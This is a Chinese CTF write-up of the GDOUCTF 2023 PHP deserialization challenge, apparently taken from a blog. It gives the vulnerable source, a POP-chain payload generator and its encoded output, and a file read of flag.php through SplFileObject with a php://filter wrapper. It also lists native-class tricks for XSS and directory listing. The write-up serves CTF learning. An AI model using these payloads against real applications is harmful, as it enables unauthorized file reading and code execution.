(反序列化)[GDOUCTF 2023]反方向的钟

php 复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

先看看利用点:

应该是_POST\['a'\](_POST['b']);

尝试构造链子school::IPO() -> school::__wakeup ->classroom::hahaha->teacher

编写payload

php 复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name='ing';
    public $rank='department';
}

class classroom{
    public $name='one class';
    public $leader;
}

class school{
    public $department;
    public $headmaster='ong';
}
$a=new school();
$b=new classroom();
$c=new teacher();
$a->department=$b;
$b->leader=$c;
echo base64_encode(serialize($a));
?>

结果:                      
Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=

接下来构造post的a和b即可

尝试a=system&b='ls'不行

上网查用php的内置类SplFileObject来读取文件内容

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

即原生类和伪协议

原生类

php原生类

Error/Exception XSS

<?php

$a = serialize(new Exception("<script>alert(1)</script>"));

echo $a;

SplFileObject 读文件

<?php

$a = new SplFileObject("flag.txt");

echo $a;

DirectoryIterator 遍历目录

<?php

$a = new DirectoryIterator(".");

foreach (a as b) {

echo $b->getFilename() . "\n";

}

FilesystemIterator 遍历目录

<?php

$a = new FilesystemIterator(".");

foreach (a as b) {

echo $b->getFilename() . "\n";

}

相关推荐
待什么青丝9 分钟前
【TMS570LC4357】之相关驱动开发学习记录2
c语言·arm开发·驱动开发·单片机·学习
行云流水剑20 分钟前
【学习记录】如何使用 Python 提取 PDF 文件中的内容
python·学习·pdf
虾球xz1 小时前
CppCon 2015 学习:CLANG/C2 for Windows
开发语言·c++·windows·学习
蓝婷儿2 小时前
6个月Python学习计划 Day 17 - 继承、多态与魔术方法
开发语言·python·学习
持续前进的奋斗鸭3 小时前
Postman测试学习(1)
学习·postman
冰橙子id3 小时前
centos7编译安装LNMP架构
mysql·nginx·架构·centos·php
hello kitty w3 小时前
Python学习(7) ----- Python起源
linux·python·学习
一叶知秋秋3 小时前
python学习day39
人工智能·深度学习·学习
永日456703 小时前
学习日记-day24-6.8
开发语言·学习·php
安和昂4 小时前
【iOS】 Block再学习
学习·ios·cocoa